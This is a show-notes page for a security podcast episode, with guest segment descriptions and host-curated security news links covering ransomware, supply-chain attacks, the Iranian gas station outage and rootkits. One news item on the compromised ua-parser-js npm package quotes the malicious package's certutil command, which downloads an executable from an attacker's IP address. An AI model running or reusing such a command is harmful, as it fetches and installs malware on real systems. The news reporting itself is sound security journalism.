psw716

Paul’s Security Weekly Episode #716 – October 27, 2021

Subscribe to all of our shows and mailing list by visiting: https://securityweekly.com/subscribe

1. Focusing on Preventing Ransomware – 06:00 PM-06:45 PM

Announcements

  • Security Weekly Unlocked will be held IN PERSON this December 5-7 at the Hilton Lake Buena Vista! Keynotes from Alyssa Miller, John Strand, Lesley Carhart, & Dave Kennedy! Visit https://securityweekly.com/unlocked to register for free and check out our rockstar lineup!

Description

A good backup is not prevention. Its recovery. Roger A. Grimes, author of the just released Ransomware Protection Playbook (Wiley), and author of 12 other books and over 1100 articles on computer security is going to discuss how sophisticated ransomware is today, how it usually breaks in, what it does, and what every person and organization should be doing to stop it. Hint, it doesn’t involve firewalls, antivirus software, or any other super special software supposedly designed to stop every attack. Come get the straight dope in what you and your company should be doing to prevent ransomware from getting a foothold into your environment…from the guy that wrote the book on it.

Guest(s)

Roger Grimes

Roger Grimes – Data-Driven Defense Evangelist at KnowBe4

@rogeragrimes

34-year computer security veteran, author of 13 books and over 1100 articles on computer security.

Hosts

JeffMan

Jeff Man

@MrJeffMan

#HackingisNotaCrime Advocate, Sr. InfoSec Consultant at Online Business Systems

JoshMarpet

Josh Marpet

@quadling

Executive Director at RM-ISAO

LarryPesce

Larry Pesce

@haxorthematrix

Principal Managing Consultant and Director of Research & Development at InGuardians

LeeNeely

Lee Neely

@lelandneely

Senior Cyber Analyst at Lawrence Livermore National Laboratory

PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

TylerRobinson

Tyler Robinson

@tyler_robinson

Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element

2. What Exactly Is an Incident Commander, Anyway – 07:00 PM-07:45 PM

Announcements

  • InfoSec World 2021 is proud to announce its keynote lineup for this year’s event! Hear from Robert Herjavec plus heads of security at the NFL, TikTok, U.S. Department of Homeland Security, Stanford University, and more… Plus, Security Weekly listeners save 20% on Digital Pass registration! Visit https://securityweekly.com/isw2021 to register now!

Description

You may have seen the term “Incident Commander” in discussions about incident response, but do you know where that term came from and what it means? How can professionalizing your incident response using proven disaster management methodology up your game? Matt Linton is an experienced Emergency Responder and USA Region lead of Google’s Security Response team. For the past decade he’s been working on bringing the lessons learned from physical disaster management into the digital forensics and incident response realm.

Guest(s)

Matt Linton

Matt Linton – Chaos Specialist at Google

@0xMatt

Matt cut his technical teeth in the MUDs and IRC dens of the 90s while daylighting in search and rescue. His longtime white hat security hobby and years of work experience in high-pressure environments converged in a career change to UNIX system administration. While working for a government research lab, his diverse background readily lent itself to new work assignments in both blue team security operations and red team penetration testing. Today he leads security incident management at Google, where he strives to infuse security functions with the best practices of disaster management, and where he explores the limits of speed, quality, and affordability in the fields of digital forensics and incident response.

Hosts

JeffMan

Jeff Man

@MrJeffMan

#HackingisNotaCrime Advocate, Sr. InfoSec Consultant at Online Business Systems

JoshMarpet

Josh Marpet

@quadling

Executive Director at RM-ISAO

LarryPesce

Larry Pesce

@haxorthematrix

Principal Managing Consultant and Director of Research & Development at InGuardians

LeeNeely

Lee Neely

@lelandneely

Senior Cyber Analyst at Lawrence Livermore National Laboratory

PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

TylerRobinson

Tyler Robinson

@tyler_robinson

Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element

3. Iranian Gas, Smelly Towns, View Source Legality, EBCDIC & GDPR, & Unlocking Oculus Go – 08:00 PM-09:30 PM

Announcements

  • Join us for our next live webcast on November 4th to learn about Pragmatic Steps to Reduce Your Software Supply Chain Risk. Then join us November 11th to learn the key insights and takeaways from the the 2021 OWASP top ten. Visit https://securityweekly.com/webcasts to save your seat! Don’t forget to check out our library of on-demand webcasts & technical trainings at https://securityweekly.com/ondemand

Description

This week in the Security News we talk: Its still not illegal to look at HTML source code, Nobelium strikes again, npm infections, gas is cheap in Iran, if you can get it, Google Tensor, going beyond the transport layer with HTTPS, buying a power plan, EBCDIC and GDPR, how children can infect parents, signing your rootkit, dates are hard, something smells funny and bird poop in your antenna, & more!

Hosts

JeffMan

Jeff Man

@MrJeffMan

#HackingisNotaCrime Advocate, Sr. InfoSec Consultant at Online Business Systems

  1. POS Device Maker Pax Draws Scrutiny Following Allegations of ‘Strange Network Activity’
JoshMarpet

Josh Marpet

@quadling

Executive Director at RM-ISAO

LarryPesce

Larry Pesce

@haxorthematrix

Principal Managing Consultant and Director of Research & Development at InGuardians

  1. Add Mycelium To Your Mesh Networks
  2. FBI Releases Indicators of Compromise Associated with Ranzy Locker Ransomware
  3. Cracking WiFi at Scale with One Simple Trick
  4. Unlocking Oculus Go
  5. Copyleft Compliance Projects – Software Freedom Conservancy
  6. SS7 Attack Panel: Yet Another Rising SCAM on Social Media
  7. California town? This could be the studio… – SQUIRREL! I love this industry… it is the only one I know of where you can mention snort, vomit and burp and not be talking about a bodily function.
LeeNeely

Lee Neely

@lelandneely

Senior Cyber Analyst at Lawrence Livermore National Laboratory

  1. Viewing website HTML code is not illegal or “hacking,” prof. tells Missouri gov. – The cybersecurity professor who helped uncover the Missouri government’s failure to protect teachers’ Social Security numbers has demanded that the state cease its investigation into him and stop making “baseless accusations” that he committed a crime.

    Khan hired an attorney to defend himself against the state’s accusations. On Thursday last week, Khan’s attorney sent a litigation hold and demand letter to Parson and several state agencies. The letter says that Parson and other state officials defamed Khan and violated his First Amendment “right to speak freely without the threat of government retaliation.” The letter adds the Show Me State’s investigation into Khan “would violate the prohibition on malicious prosecution.”

    “Professor Khan is likely to prevail on the merits of any case brought against him,” the letter said. “No statute in Missouri or on the federal level prohibits members of the general public from viewing publicly available websites or viewing the website’s unencrypted source code. No reasonable person would think they were unauthorized to view a publicly available website, its unencrypted source code, or any of the unencrypted translations of that source code. There is no probable cause to investigate Professor Khan, and instigation or continuation of any proceeding against him would therefore be prohibited.”

  2. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns – Microsoft has issued a warning to organizations that the “Nobelium” hacking group behind the SolarWinds attacks has targeted some 140 technology service providers and resellers as part of a global IT supply chain attack.
  3. Another popular npm package infected with malware – In an audacious incident, threat actors hijacked the account of the developer of a widely used JavaScript library, UAParser.ja, to replace the legitimate code with malicious one infused with malware and trojans.
  4. TodayZoo phishing kit borrows the code from other kits – Researchers say they have discovered a series of credential phishing campaigns in which hackers are leveraging a phishing kit dubbed “TodayZoo” that uses large portions of code lifted from various other phishing kits in order to steal credentials. According to Microsoft, TodayZoo was first identified in December 2020 and includes portions of code such as comment markers, dead links, and other elements found in other, previous phishing kits.
  5. Groove ransomware calls on all extortion gangs to attack US interests – The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil’s infrastructure last week.

    Over the weekend, BleepingComputer reported that the REvil ransomware operation shut down again after an unknown third party hijacked their dark web domains.

  6. Iran says cyberattack closes gas stations across country – A cyberattack crippled gas stations across Iran on Tuesday, leaving angry motorists stranded in long lines.

    No group immediately claimed responsibility for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.

  7. Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware – An unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware.
    An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular billing software suite BillQuick Web Suite time to deploy ransomware.
PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

  1. FBI Raids Chinese Point-of-Sale Giant PAX Technology – Krebs on Security
  2. Apple Patches Critical iOS Bugs; One Might Be Under Attack
  3. Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services
  4. How hackers hijacked thousands of high-profile YouTube accounts
  5. SALAD SHOOTER: June 1963: Discovery of the Cosmic Microwave Background – “Take the case of Bell Labs physicists Arno Penzias and Robert Wilson, who set out to map radio signals from the Milky Way and wound up being the first to measure the cosmic background radiation (CMB). Their momentous discovery made it possible to obtain information about cosmic processes that took place about 14 billion years ago, and forever changed the science of cosmology, transforming it from a specialty of a select few astronomers to a “respectable” branch of physics almost overnight.” All stemmed from me watching this video, as part of my son’s homework! https://www.youtube.com/watch?v=hcds5Ob59Dg – Also interesting is that they started to look into interference for some of the first satellite phones. They cleaned bird poop out of the antenna as a potential source of interference. 1% of the static on your TV with an antenna if you tune in between the channels, comes from residual big bang microwave radiation.
  6. 70% of WiFi Network Samples Cracked in a WiFi Network Cracking Experiment
  7. Pixel 6: Setting a new standard for mobile security – I can’t wait: “The Google Tensor security core is a custom designed security subsystem dedicated to the preservation of user privacy. It’s distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core’s primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2TM.”
  8. Why I think all budding ethical hackers should take CS50x or learn some bit of Computer Science.
  9. HTTPS Attestable (HTTPA) Protocol – Enhancing HTTPS Security – I really think of HTTPS as protecting the transport layer, however, Intel is proposing extending it as: ““HTTPS cannot provide security assurances on the request data in compute, so the computing environment remains uncertain risks and vulnerabilities.”
  10. Malicious Firefox Add-ons Block Browser From Downloading Security Updates – We need some further restrictions on what add-ons can do: “The two extensions in question, named Bypass and Bypass XM, “interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content,””
  11. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns
  12. North Korea Linked Lazarus APT Now Targets the IT supply chain. – CyberWorkx
  13. Iranian gas stations out of service after distribution network hacked – First, like wow: “According to media reports, the “cyberattack 64411” message appeared to customers that tried to get subsidized fuel at 5 cents a liter or 20 cents a gallon using government-issued cards.” Also, a coordinated attack: “As news spread about the NIOPDC distribution network being under attack, digital billboards in multiple cities in Iran started to show messages reading “Khamenei! Where’s our fuel?” and “Free fuel in Jamaran station.”” and this LOL: ” Iranian state television confirned the reports of a cyberattack hitting gas stations and Iran’s Supreme Council of Cyberspace believes the incident is state-sponsored, although it is early to say which country is behind it.” – Gee I wonder who?
  14. Azure AD Default Configuration Blunders
  15. Bitcoin-mining power plant raises ire of environmentalists – “Greenidge Generation runs a once-mothballed plant near the shore of Seneca Lake in the Finger Lakes region to produce about 44 megawatts to run 15,300 computer servers, plus additional electricity it sends into the state’s power grid. The megawatts dedicated to Bitcoin might be enough electricity to power more than 35,000 homes.”
  16. EBCDIC is incompatible with GDPR – So, the bank could not spell a customer’s name correctly, due to diacritical marks. The customer filed a GDPR complaint under Article 16 (“The data subject shall have the right to obtain from the controller without undue delay the rectification of inaccurate personal data concerning him or her.”). The bank says this is impossible because, get this, the system they use only supports EBCDIC!
  17. PHP-FPM local root vulnerability – This, THIS is why I hate parent processes running as root and child processes running with lower privileges: “A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process’s memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges.”
  18. Breaking the News: New York Times Journalist Ben Hubbard Hacked with Pegasus after Reporting on Previous Hacking Attempts – The Citizen Lab
  19. Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) – Questions about deprecated npm package ua-parser-js · Issue #536 · faisalman/ua-parser-js – Yikes: “certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe”
  20. Digitally-Signed Rootkits are Back – A Look at FiveSys and Companions – I really want to know how this works: “For the past few months, Bitdefender researchers have seen a surge in malicious drivers with valid digital signatures issued through the WHQL signing process. This research focuses on FiveSys – a digitally signed rootkit that made its way through the driver certification process.” – The whitepaper does not really say, unless I missed it, how the attackers managed this: “The reason for this might be the new Driver Signing requirements from Microsoft, which demand drivers to be digitally signed by Microsoft before acceptance by the operating system. This new requirement ensures that all drivers are validated and signed by the operating system vendor rather than the original developer and, as such, digital signatures offer no indication as to the identity of the real developer. It seems that malware writers managed to work around the new requirements, as Netflter and new FiveSys demonstrated.”
  21. CISA warns of GPS bug that may roll back dates by 1,024 weeks, to March 2002 – Coding dates and time is hard: https://gitlab.com/gpsd/gpsd/-/issues/144 – Looks like in accounting for leap year they created a time machine: “trigger a 1024 week backward time jump from Saturday October 16, 2021 to Sunday March 3, 2002”.
TylerRobinson

Tyler Robinson

@tyler_robinson

Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element